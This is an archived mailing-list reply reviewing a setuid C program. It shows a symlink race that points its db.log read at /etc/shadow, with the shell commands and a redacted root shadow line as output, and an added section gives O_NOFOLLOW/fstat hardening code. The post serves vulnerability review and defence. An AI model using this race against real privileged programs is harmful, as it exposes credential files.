>
> /* read log */
> if ( (f1 = fopen("db.log", "r")) == NULL)
>     return 1;
> if (fgets(bfp, BFSIZE, f1) == NULL)
>     return 1;

...and if db.log is perhaps a symlink to /etc/shadow?

I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.

I compiled the program, stopped it after it wrote the input log, made a
symlink, and resumed running the program, with lovely results:

    [tcannon@needle]$ rm db.log
    [tcannon@needle]$ ln -s /etc/shadow db.log
    [tcannon@needle]$ fg
    ./a.out
    a a
    root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::

I like race conditions.

No point in wasting your CPU -- that shadowed password did get modified
before I sent it to the list :-)

Cheers,
--tcannon

PS: Nice strcpy
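The fix a reviewer would ask for on the quoted fopen("db.log", "r") line, as an added example that is not code from the thread or from the program under discussion: open the log with O_NOFOLLOW so a symlink planted between runs is refused at open time, then validate the descriptor you actually got with fstat() rather than a racy stat()-then-open. For a 4755 binary the primary remedy is still to drop root before touching any user-named path; this check closes the redirection shown in the session above. The function names, the st_uid == getuid() policy and the /tmp demo directory are my own assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened replacement for fopen("db.log", "r"): refuse to follow a symlink at
 * open time (no racy stat()-then-open), then check the opened descriptor. Returns
 * NULL if the path is a symlink, not a regular file, or not owned by the real uid. */
FILE *open_log_nofollow(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return NULL;          /* ELOOP: a symlink was refused */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        return NULL;
    }
    return fdopen(fd, "r");
}

/* Demonstration: create a regular db.log and a symlink to it in a fresh temp
 * directory (constructed test data, hypothetical paths). Returns 1 when the
 * regular file opens and the symlink is refused, 0 otherwise. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/logdemo.XXXXXX";
    char real[256], lnk[256];
    int ok = 0;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(real, sizeof real, "%s/db.log", dir);
    snprintf(lnk, sizeof lnk, "%s/db.log.lnk", dir);
    FILE *w = fopen(real, "w");
    if (w) {
        fputs("a a\n", w);
        fclose(w);
        if (symlink(real, lnk) == 0) {
            FILE *direct = open_log_nofollow(real);
            FILE *via_link = open_log_nofollow(lnk);
            ok = (direct != NULL) && (via_link == NULL);
            if (direct) fclose(direct);
            if (via_link) fclose(via_link);
        }
    }
    unlink(lnk); unlink(real); rmdir(dir);
    return ok;
}
```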
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:39:30 PDT